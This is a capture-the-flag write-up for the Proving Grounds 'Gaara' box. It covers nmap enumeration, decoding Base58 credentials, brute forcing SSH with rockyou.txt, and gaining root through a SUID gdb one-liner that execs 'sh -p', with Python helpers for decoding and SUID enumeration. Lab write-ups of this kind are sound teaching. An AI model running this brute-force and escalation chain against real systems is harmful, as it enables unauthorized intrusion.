GAARA — Offensive Security PG Play

“Long time, No see…. NARUTO!!..”

We start the enumeration process with a simple Nmap scan:

nmap -p- -sC -sV --open -oN nmap.txt $IP

We find port 80 open and visit it in the browser first. Brute forcing hidden directories turns up /Cryoserver. Static analysis of that page reveals three more directories, and in /iamGaara we find a strange-looking string. Decoding it as Base58 gives us a name and a set of credentials.
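As an added example (not code from the original write-up), here is a dependency-free Base58 decoder and encoder with a quick alphabet check, the step used to turn the odd string into a name and credentials. The sample string is constructed for this example; the real string from the box is not reproduced, and the "name:password" layout assumed by decode_credential_blob is an assumption, not something the page states.

```python
# Added example, not from the original write-up: Base58 decode/encode and a
# cheap alphabet check to tell Base58 apart from Base64 before decoding.
# SAMPLE_PLAIN is constructed for this example; the "name:password" layout is
# an assumption.

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {c: i for i, c in enumerate(BASE58_ALPHABET)}


def looks_like_base58(s: str) -> bool:
    """True when every character is in the Bitcoin Base58 alphabet.
    Base64 output is rejected as soon as it contains 0, O, I, l, +, / or =,
    which is a cheap way to tell the two apart before trying to decode."""
    return bool(s) and all(c in _INDEX for c in s)


def b58decode(s: str) -> bytes:
    """Decode a Base58 string to bytes (big-endian base conversion)."""
    if not looks_like_base58(s):
        raise ValueError("not a Base58 string")
    num = 0
    for c in s:
        num = num * 58 + _INDEX[c]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    # Each leading '1' encodes one leading zero byte.
    leading_zeros = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Encode bytes to Base58 (inverse of b58decode)."""
    num = int.from_bytes(data, "big")
    out = []
    while num:
        num, rem = divmod(num, 58)
        out.append(BASE58_ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(out))


def decode_credential_blob(s: str) -> dict:
    """Decode a Base58 blob and split a 'name:password' payload.
    The colon-separated layout is an assumption made for this example."""
    text = b58decode(s).decode("utf-8", errors="replace")
    name, _, secret = text.partition(":")
    return {"raw": text, "name": name, "password": secret}


# Constructed sample: what such a credential string might look like.
SAMPLE_PLAIN = b"gaara:not-the-real-password"
SAMPLE_BLOB = b58encode(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_BLOB)
    print(decode_credential_blob(SAMPLE_BLOB))
```

The alphabet check is the practical part: a string with no 0, O, I or l and no +, / or = padding is a strong hint to try Base58 before the usual Base64 attempt.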

Those credentials did not log in over SSH, but they did give us a valid username. Brute forcing SSH with that username and the rockyou.txt wordlist finds a password that logs in successfully.

During post-exploitation enumeration I found that gdb has the SUID bit set, as shown. So what now?

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor.
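As an added example (not code from the original write-up), this is the SUID enumeration step in Python, the same check as `find / -perm -4000 -type f 2>/dev/null`, with a triage pass that flags names GTFOBins documents as SUID escalators. The directory tree it scans is constructed in a temporary directory so it runs anywhere; the escalator set is a small illustrative subset and is an assumption, not an exhaustive list.

```python
# Added example, not from the original write-up: enumerate SUID binaries
# under a root and flag the ones with a known escalation path.
# The scanned tree is constructed in a temp dir; KNOWN_SUID_ESCALATORS is a
# small illustrative subset (assumption, not exhaustive).
import os
import stat
import tempfile

KNOWN_SUID_ESCALATORS = {
    "gdb", "find", "vim", "python", "python3", "perl", "bash", "env", "nmap",
}


def find_suid(root: str) -> list:
    """Return sorted paths of regular files under `root` with the SUID bit set.

    lstat is used so symlinks are never followed: a link to a SUID binary is
    not itself SUID, and following links can also walk out of the tree."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # unreadable entries: skip, like 2>/dev/null
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage(paths: list) -> dict:
    """Split SUID hits into ones with a known escalation path and the rest."""
    interesting = [p for p in paths if os.path.basename(p) in KNOWN_SUID_ESCALATORS]
    other = [p for p in paths if p not in interesting]
    return {"interesting": interesting, "other": other}


def _touch(path: str, mode: int) -> None:
    """Create a placeholder file (never executed) with the given mode bits."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(path, mode)


def demo() -> dict:
    """Build a constructed mini filesystem and return triaged basenames."""
    root = tempfile.mkdtemp(prefix="suid-lab-")
    _touch(os.path.join(root, "usr/bin/gdb"), 0o4755)   # SUID, known escalator
    _touch(os.path.join(root, "usr/bin/ping"), 0o4755)  # SUID, nothing obvious
    _touch(os.path.join(root, "usr/bin/ls"), 0o755)     # no SUID bit
    # A symlink to the SUID gdb must not be reported a second time.
    os.makedirs(os.path.join(root, "usr/local/bin"))
    os.symlink(os.path.join(root, "usr/bin/gdb"),
               os.path.join(root, "usr/local/bin/gdb"))
    result = triage(find_suid(root))
    return {k: [os.path.basename(p) for p in v] for k, v in result.items()}


if __name__ == "__main__":
    print(demo())
```

Run against a real host with find_suid("/"); anything in the "interesting" bucket is worth checking against GTFOBins before anything else, and the "other" bucket still deserves a look at what the binary actually does.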

Abusing the SUID gdb to become root. gdb's embedded Python interpreter execs a shell; -nx skips any .gdbinit, and sh -p keeps the elevated effective UID instead of dropping it back to the real UID:

./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

And we are root with the flag.

That’s all for now,

Until Next Time,

“Stay CHILL” Jutsu!

— — — — — — — — — — — — — — — — — — — — — — — — — —

To reach me for any query or help:

Neelesh Patel

Cybersecurity | CTFs | Networking |